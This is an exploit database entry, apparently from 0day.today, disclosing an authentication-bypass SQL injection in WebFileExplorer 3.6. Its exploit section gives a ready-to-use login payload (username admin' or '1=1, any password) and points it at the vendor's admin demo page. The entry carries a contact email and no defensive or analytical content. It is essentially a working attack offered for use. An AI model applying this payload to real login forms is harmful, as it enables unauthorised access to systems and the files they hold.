id: 16328
date: 06/12/2011
title: WebFileExplorer 3.6 (Auth Bypass) SQL Injection Vulnerability
author: Pentesters.ir
cves: 

In The Name Of GOD
# Exploit Title: WebFileExplorer 3.6 (Auth Bypass) SQL Injection Vulnerability
# Date: 2011-06-12
# Software Link: http://www.webfileexplorer.com/
# Version: 3.6
# Price: 99$
# Contact : Cru3l.b0y@gmail.com
# Website : http://pentesters.ir/forum/
 
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Exploit:
go to demo here: http://www.webfileexplorer.com/admindemo/
user: admin' or '1=1
pass: anything



#  0day.today [2023-03-24]  #